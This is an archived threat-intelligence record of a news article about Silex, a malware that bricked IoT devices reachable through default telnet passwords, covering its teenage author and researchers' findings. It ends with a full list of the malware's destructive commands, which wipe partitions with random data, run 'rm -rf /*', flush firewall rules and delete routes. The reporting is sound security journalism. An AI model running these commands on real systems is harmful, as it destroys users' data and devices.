{
	"id": "a6321a13-3dcc-466c-88d5-88cf0ad0e66c",
	"created_at": "2026-04-10T03:21:27.927897Z",
	"updated_at": "2026-04-10T03:22:17.426954Z",
	"deleted_at": null,
	"sha1_hash": "1fa5aa0480b2472041e4dcf7acb14e5e138ee20d",
	"title": "New Silex Malware Trashes IoT Devices Using Default Passwords",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2238125,
	"plain_text": "New Silex Malware Trashes IoT Devices Using Default Passwords\r\nBy Ionut Ilascu\r\nPublished: 2019-06-26 · Archived: 2026-04-10 02:22:29 UTC\r\nA teen coder and his team developed a new malware named Silex that purposely bricked poorly protected IoT\r\ndevices by the thousands in a short period of time.\r\nThe attacks have stopped as the command and control (C2) server went down around 4 PM Eastern Time, by the\r\ndeveloper's doing. Even without a C2 to send out instructions, the malware will still run its destruction routines on\r\ninfected devices.\r\nBricking devices to prove a point\r\nAccording to security researcher Ankit Anubhav from NewSky, Silex was created by a team of three, with the\r\nmain person being a teenager from a European country using the aliases 'Light The Leafon' and 'Light The\r\nSylveon.'  The other two members are 'Alx' and 'Skiddy'.\r\nLight The Leafon is the author of another bot called HITO, which was based off another IoT malware named\r\nMirai. He soon developed skills that allowed him to write his own botnet.\r\nhttps://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/\r\nPage 1 of 4\n\nAs for the purpose of Silex, it is designed solely to brick IoT devices to prevent script kiddies from getting to\r\nthem. Simply put, the malware author is fighting less skilled developers from compromising unprotected systems\r\nand using them to make money.\r\nWhen it runs, Silex shows the following message from the author apologizing for the attack and explaining the\r\nreason behind it:\r\nAnubhav talked to Light about HITO two months ago and published the interview on his podcast. The author said\r\nduring the interview that he was 14 years old.\r\nSilex destructive routines\r\nLarry Cashdollar of Akamai Security Intelligence Response Team (SIRT) was the first to discover Silex on\r\nTuesday. 
The malware hit his honeypot by trying default credentials over a telnet connection.\r\nThe researcher says that Silex kills the system it infects by writing random data from '/dev/random' to all the\r\nstorage drives it finds.\r\n\"Examining binary samples collected from my honeypot, I see Silexbot calling fdisk -l which will list all disk\r\npartitions. Using that list, Silexbot then writes random data from /dev/random to any of the partitions it discovers,\"\r\nCashdollar writes in his analysis.\r\nSilex then runs other harmful commands that delete network configurations, flush iptables, and add a rule that\r\nDROPS all connections, before rebooting the device. A list of the damaging commands it executes to brick the IoT\r\ndevice is available at the end of the article.\r\nThese instructions make the affected system inoperable but they can still be recovered by reinstalling the\r\nfirmware. However, this is an operation most users lack the knowledge to perform and their gadgets may end up in\r\nthe trash since they seem to no longer function.\r\nCashdollar examined binaries for ARM systems but there was also a Bash shell version available for download, so\r\nany UNIX-like architecture could have been a target.\r\nAnubhav also observed Silex on a honeypot he manages and saw the same destructive behavior as Cashdollar.\r\nThe researcher told BleepingComputer the attack was over telnet protected with weak credentials or default\r\npasswords. 
After establishing a connection \"the bot downloads the binary and confirms the busybox shell\" and\r\nthen executes the bricking commands.\r\nToo much heat makes Light split\r\nAnubhav talked to Light today and the malware author stated he never wanted the type of attention he is getting\r\nand he would leave the IoT community.\r\n\"I am leaving the community because I am getting more attention then I'd like, I never wanted this clout. I will\r\nkeep coding and doing that but not go further in the IoT community,\" Light told the security researcher.\r\nThe original plan for Silex was to grow the botnet by integrating new methods of compromise, like exploits for\r\nknown vulnerabilities.\r\nSilex commands:\r\n\"busybox cat /dev/urandom \u003e/dev/mtdblock0\"\r\n\"busybox cat /dev/urandom \u003e/dev/sda\"\r\n\"busybox cat /dev/urandom \u003e/dev/ram0\"\r\n\"busybox cat /dev/urandom \u003e/dev/mmc0\"\r\n\"busybox cat /dev/urandom \u003e/dev/mtdblock10\"\r\n\"fdisk -C 1 -H 1 -S 1 /dev/mtd0\"\r\n\"fdisk -C 1 -H 1 -S 1 /dev/mtd1\"\r\n\"fdisk -C 1 -H 1 -S 1 /dev/sda\"\r\n\"fdisk -C 1 -H 1 -S 1 /dev/mtdblock0\"\r\ncat /proc/mounts\r\ncat /dev/urandom | mtd_write mtd0 - 0 32768\r\ncat /dev/urandom | mtd_write mtd1 - 0 32768\r\nbusybox cat /dev/urandom \u003e/dev/mtd0 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/sda \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtd1 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtdblock0 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtdblock1 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtdblock2 \u0026\r\nbusybox cat /dev/urandom \u003e/dev/mtdblock3 \u0026\r\nbusybox route del default\r\ncat /dev/urandom \u003e/dev/mtdblock0 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock1 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock2 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock3 \u0026\r\ncat /dev/urandom 
\u003e/dev/mtdblock4 \u0026\r\ncat /dev/urandom \u003e/dev/mtdblock5 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p9 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p12 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p13 \u0026\r\ncat /dev/urandom \u003e/dev/root \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p8 \u0026\r\ncat /dev/urandom \u003e/dev/mmcblk0p16 \u0026\r\nroute del default\r\niproute del default\r\nip route del default\r\nrm -rf /* 2\u003e/dev/null \u0026 iptables -F\r\niptables -t nat -F\r\niptables -A INPUT -j DROP\r\niptables -A FORWARD -j DROP\r\nhalt -n -f\r\nreboot\r\nSource: https://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/"
	],
	"report_names": [
		"new-silex-malware-trashes-iot-devices-using-default-passwords"
	],
	"threat_actors": [],
	"ts_created_at": 1775791287,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1fa5aa0480b2472041e4dcf7acb14e5e138ee20d.pdf",
		"text": "https://archive.orkl.eu/1fa5aa0480b2472041e4dcf7acb14e5e138ee20d.txt",
		"img": "https://archive.orkl.eu/1fa5aa0480b2472041e4dcf7acb14e5e138ee20d.jpg"
	}
}